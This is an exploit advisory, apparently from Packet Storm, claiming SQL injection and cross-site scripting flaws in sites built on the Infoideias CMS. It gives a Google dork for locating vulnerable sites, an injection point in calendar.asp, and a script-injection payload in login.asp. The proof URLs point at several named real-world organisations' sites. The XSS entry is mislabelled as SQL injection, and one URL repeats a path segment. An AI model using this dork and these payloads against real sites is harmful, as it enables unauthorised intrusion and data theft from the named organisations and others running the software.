Site powered by Infoideias suffer from cross site scripting and remote SQL injection vulnerabilities. Note that this advisory has site-specific information.
a0dc4586252b198ea0db1cb5fbbd00714ea51b5c2acecf9616f952e939303aee#********************************************************************************
# Exploit Title : Infoideias Multiple Vulnerabilites
#
# Exploit Author : Ashiyane Digital Security Team
#
# Software Link : http://www.infoideias.com.br
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Powered by Infoideias"
#
# Date: 2013/09/10
#
--------------------------------------------------------------------
# Exploit : Sql Injection
#
# Location : [Target]/incrio/calendar.asp?auxid=[Sql Injection]
#
#
# Proof:
#
# http://www.americansocietyrio.org/incrio/calendar.asp?auxid='
#
# http://www.bcsrio.org.br/incrio/calendar.asp?auxid='
#
# http://www.christchurchrio.org.br/incrio/calendar.asp?auxid='
#
# http://www.riosocieties.com.br//incrio/calendar.asp?auxid='
#
# http://riosocieti.dominiotemporario.com/incrio/calendar.asp?auxid='
#
--------------------------------------------------------------------
# Exploit 2 : Cross site scripting
#
# Location : [Target]/incrio/login.asp?button=Login&login=[Sql Injection]
#
#
# Proof:
#
# http://www.americansocietyrio.org/incrio/login.asp?button=Login&login=
"/><script>alert(1);</script>
#
# http://www.bcsrio.org.br/incrio/incrio/login.asp?button=Login&login=
"/><script>alert(1);</script>
#
# http://www.christchurchrio.org.br/incrio/login.asp?button=Login&login=
"/><script>alert(1);</script>
#
# http://www.riosocieties.com.br/incrio/login.asp?button=Login&login=
"/><script>alert(1);</script>
#
#
http://riosocieti.dominiotemporario.com/incrio/login.asp?button=Login&login=
"/><script>alert(1);</script>
#
######################
discovered by : ACC3SS
######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed